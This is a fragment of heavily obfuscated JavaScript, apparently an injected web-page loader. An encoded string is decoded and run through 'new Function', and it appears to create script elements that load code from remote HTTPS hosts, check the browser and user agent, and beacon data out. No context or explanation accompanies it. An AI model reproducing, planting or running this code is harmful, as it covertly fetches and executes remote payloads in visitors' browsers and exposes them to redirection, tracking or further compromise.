)ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();